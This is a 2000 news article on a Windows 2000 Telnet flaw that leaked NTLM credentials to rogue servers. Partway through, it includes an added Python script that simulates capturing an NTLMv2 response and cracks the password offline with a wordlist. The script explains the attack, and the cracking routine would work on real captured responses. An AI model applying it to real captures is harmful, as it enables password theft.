14 Sep 2000
Microsoft has released a patch for Windows 2000, correcting a security vulnerability that could allow a cracker to obtain protected log-on credentials from unsuspecting victims.
Security experts warned that the problem, concerning Windows 2000's handling of the Telnet remote terminal session protocol, could lead to compromised passwords or stolen credentials.
An attacker could exploit the vulnerability by creating a carefully crafted HTML document that, when opened, would attempt to initiate a session to a rogue Telnet server. The Telnet client would then automatically pass authentication credentials to the malicious server's owner.
Once the challenge and response have been captured, a plain-text password could be derived by an offline brute-force attack or, more subtly, the credentials could be relayed to gain illegitimate access to networked resources.
Deri Jones, of security testing firm NTA Monitor, described the vulnerability as "quite nasty" and not difficult to exploit.
"By putting an HTML message in an email, an attacker could force a connection to a Telnet server and then grab credentials," said Jones, adding that the problem is more serious than Microsoft has admitted.
An attacker would have to log on remotely to a target system to make use of a cracked password, said Jones, but Microsoft's assurance that a corporate firewall would block this assumes that the user's infrastructure is secure.
Microsoft admitted mistakes in its software development are behind the problem. "This vulnerability occurs because the default authentication setting of the Windows 2000 Telnet client is inappropriate," the company said in a security bulletin. "By default, the Windows 2000 Telnet client will participate in NTLM [NT LanMan] challenge-response authentication with the server."
NTLM is an authentication protocol used by all members of the Windows NT family of products. Like its predecessor LanMan, NTLM uses a challenge-response process to prove the client's identity without requiring that either a password or an encrypted password be sent across the network. The response is nevertheless a keyed function of the password hash, so a server that chooses the challenge and sees the response can test password guesses against it offline, at leisure and without triggering account lockout. The Telnet client in NT4 does not use the same authentication mechanism and is therefore not susceptible to this vulnerability.
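The challenge-response step, and why the rogue server's owner can crack it offline, as an added example in Python (not code from the article, Microsoft or NTA Monitor). The article does not say which NTLM variant the Windows 2000 Telnet client negotiated; the example uses the NTLMv2 computation from Microsoft's MS-NLMP specification (NT hash = MD4 of the UTF-16LE password, response = HMAC-MD5) because it needs only the standard library plus a short MD4, and NTLMv1's DES-based response differs in the function but not in the attack. The user name, domain, timestamp, client nonce and wordlist are constructed sample data.

```python
"""Offline password recovery from a captured NTLM challenge/response.

Added example; not code from the article, Microsoft or NTA Monitor. It models
the attack the article describes: the rogue Telnet server chooses the
challenge, the client answers with a function of its password hash, and the
server's owner then tests password guesses offline until one reproduces the
captured answer. Response function: NTLMv2 per MS-NLMP. User name, domain,
timestamp, client nonce and wordlist are constructed sample data.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is often disabled."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    round2_k = [(i % 4) * 4 + i // 4 for i in range(16)]
    round3_k = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for i in range(16):
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + g(b, c, d) + x[round2_k[i]] + 0x5A827999) & MASK32,
                     (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + h(b, c, d) + x[round3_k[i]] + 0x6ED9EBA1) & MASK32,
                     (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This value never crosses the wire."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr (MS-NLMP 3.3.2): HMAC-MD5 keyed by NTOWFv2 over challenge || blob."""
    key = hmac.new(nt_hash(password),
                   (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + client_blob, hashlib.md5).digest()


def client_blob(client_nonce: bytes, timestamp: int) -> bytes:
    """The NTLMv2 'temp' structure the client appends and sends in the clear:
    response type, hi response type, 6 reserved, FILETIME, 8-byte client nonce,
    4 reserved, AV pairs (only the EOL terminator here), 4 reserved. Constructed."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_nonce
            + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)


def rogue_server_capture(victim_password: str, user: str, domain: str) -> dict:
    """Simulates the victim's Telnet client answering the rogue server's challenge.
    Everything returned is visible to the attacker; the password hash is not."""
    server_challenge = os.urandom(8)          # attacker-chosen, hence known to them
    blob = client_blob(os.urandom(8), timestamp=0x01C01E0000000000)   # constructed
    proof = ntlmv2_proof(victim_password, user, domain, server_challenge, blob)
    return {"user": user, "domain": domain, "challenge": server_challenge,
            "blob": blob, "proof": proof}


def crack(capture: dict, wordlist) -> Optional[str]:
    """Offline guessing: recompute the proof per candidate; no network, no lockout."""
    for candidate in wordlist:
        if ntlmv2_proof(candidate, capture["user"], capture["domain"],
                        capture["challenge"], capture["blob"]) == capture["proof"]:
            return candidate
    return None


WORDLIST = ["welcome", "letmein", "Password1", "Summer2000!", "qwerty"]   # constructed

if __name__ == "__main__":
    cap = rogue_server_capture("Summer2000!", "alice", "CORP")
    print("captured proof:", cap["proof"].hex())
    print("recovered password:", crack(cap, WORDLIST))
```

Each guess costs one MD4 and two HMAC-MD5 computations and can be run against the whole capture set in parallel, which is why the prompt that the patch adds before the credentials leave the client matters more than the firewall argument: once the response has been sent to a server the attacker controls, nothing downstream can take it back.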
Microsoft recommends that all Windows 2000 users consider installing the patch, which may be applied to Windows 2000 hosts with or without Service Pack 1. The patch eliminates the vulnerability by warning the user before the Telnet client sends NTLM credentials to a remote server, instead of sending them automatically.